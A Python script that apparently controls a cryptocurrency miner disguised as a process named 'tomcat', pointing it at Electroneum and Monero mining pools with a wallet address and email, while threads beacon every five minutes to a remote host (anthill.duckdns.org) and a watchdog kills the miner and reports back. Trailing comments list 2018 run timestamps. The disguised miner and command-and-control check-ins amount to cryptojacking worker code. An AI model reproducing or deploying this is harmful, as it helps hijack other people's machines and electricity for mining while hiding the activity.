import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:02.209465
#2018-02-17 16:17:04.921903
#2018-02-17 18:06:06.419944
#2018-02-17 19:53:06.068022
#2018-02-17 21:40:04.578296
#2018-02-17 23:24:07.609768
#2018-02-18 01:13:07.449569
#2018-02-18 03:01:01.337931
#2018-02-18 04:50:07.383237
#2018-02-18 06:39:06.817173
#2018-02-18 08:28:03.777380
#2018-02-18 10:16:05.927326
#2018-02-18 12:02:05.545409
#2018-02-18 13:47:03.908172
#2018-02-18 15:36:01.446234
#2018-02-18 17:23:03.852138
#2018-02-18 19:12:05.129281
#2018-02-18 20:58:03.293245
#2018-02-18 22:43:04.299864
#2018-02-19 00:32:03.152667
#2018-02-19 02:17:01.544764
#2018-02-19 04:04:06.863472
#2018-02-19 05:48:05.751218
#2018-02-19 07:37:05.112371
#2018-02-19 09:26:08.630591
#2018-02-19 11:15:09.974309
#2018-02-19 13:03:01.299972
#2018-02-19 14:52:05.157252
#2018-02-19 16:39:08.933961
#2018-02-19 18:27:07.396622
#2018-02-19 20:14:07.378578
#2018-02-19 22:04:07.806608
#2018-02-19 23:50:04.739128
#2018-02-20 01:37:06.632431
#2018-02-20 03:25:06.299860
#2018-02-20 05:12:01.404265
#2018-02-20 06:54:07.814203
#2018-02-20 08:41:01.589666
#2018-02-20 10:25:06.315740
#2018-02-20 12:10:02.876859
#2018-02-20 13:59:06.186853
#2018-02-20 15:43:08.431581
#2018-02-20 17:29:06.638101
#2018-02-20 20:46:06.819143
#2018-02-20 23:22:07.260629
#2018-02-21 01:58:08.205012
#2018-02-21 05:00:08.385046
#2018-02-21 07:58:01.819571
#2018-02-21 11:01:06.433371
#2018-02-21 12:49:08.105653
#2018-02-21 14:37:02.143331
#2018-02-21 16:25:14.122175
#2018-02-21 18:17:07.260097
#2018-02-21 20:04:06.883179
#2018-02-21 21:52:08.691430
#2018-02-21 23:40:08.914197
#2018-02-22 01:28:07.676803
#2018-02-22 03:17:01.688283
#2018-02-22 05:04:06.636959
#2018-02-22 06:47:07.374101
#2018-02-22 08:34:02.124904
#2018-02-22 10:21:01.995986
#2018-02-22 12:07:01.444125
#2018-02-22 13:52:03.916283
#2018-02-22 15:41:05.191171
#2018-02-22 17:27:06.827712
#2018-02-22 19:16:09.609032
#2018-02-22 21:07:05.789043
#2018-02-22 22:51:01.288565
#2018-02-23 00:39:01.363519
#2018-02-23 02:26:05.930594
#2018-02-23 04:14:06.666965
#2018-02-23 05:59:06.004703
#2018-02-23 07:33:01.242777
#2018-02-23 09:35:08.528594
#2018-02-23 11:17:05.601018
#2018-02-23 12:37:09.086197
#2018-02-23 14:03:02.128492
#2018-02-23 15:40:07.995929
#2018-02-23 17:10:10.794236
#2018-02-23 18:46:05.102870
#2018-02-23 20:23:05.865736
#2018-02-23 21:57:01.943729
#2018-02-23 23:31:03.871702
#2018-02-24 01:04:06.183797
#2018-02-24 02:46:04.545832
#2018-02-24 04:23:06.363133
#2018-02-24 05:51:03.916134
#2018-02-24 07:31:01.776953
#2018-02-24 09:04:07.370766
#2018-02-24 10:43:03.761189
#2018-02-24 12:31:04.185622
#2018-02-24 14:08:05.808624
#2018-02-24 15:56:04.152069
#2018-02-24 17:48:06.451822
#2018-02-24 19:36:07.877272
#2018-02-24 21:23:03.941527
#2018-02-25 00:04:04.322740
#2018-02-25 03:18:04.541163
#2018-02-25 06:49:01.987671